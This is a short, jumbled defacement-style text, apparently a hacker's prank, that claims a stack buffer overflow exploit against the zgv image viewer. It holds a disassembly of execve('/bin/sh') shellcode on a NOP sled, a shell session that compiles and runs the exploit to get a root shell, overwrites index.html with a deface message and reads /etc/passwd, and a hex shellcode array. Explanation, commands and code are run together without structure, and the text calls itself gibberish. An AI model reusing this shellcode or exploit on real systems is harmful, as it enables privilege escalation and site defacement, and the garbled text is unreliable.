#DEFACE# 0wn3d by Daniel S. Larsen aka broke (for testing purposes)

minimal shellcode proof of concept:

At this point, zgv fails to do bounds checking, writes beyond smallbuffer, and the return address to main is overwritten with the return address on the stack. function() does leave/ret and the EIP points onto the stack:

0xbffff574 nop 0xbffff575 nop 0xbffff576 nop 0xbffff577 jmp $0x24 1 0xbffff579 popl %esi 3 <--\ | [... shellcode starts here ...] | | 0xbffff59b call -$0x1c 2 <--/ 0xbffff59e .string "/bin/shX" Lets test the exploit...

# cc -o brokeRootCrapThisIsAllBullshit zgx.c # ./brokeRootCrapThisIsAllBullshit using address 0xbffff574 bash# echo "0wn3d by Daniel ...." > index.html /* This is the minimal shellcode from the tutorial */ static char shellcode[]= "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d" "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58"; bash#cat /etc/passwd this is just gibberish prank. Just drop the index.html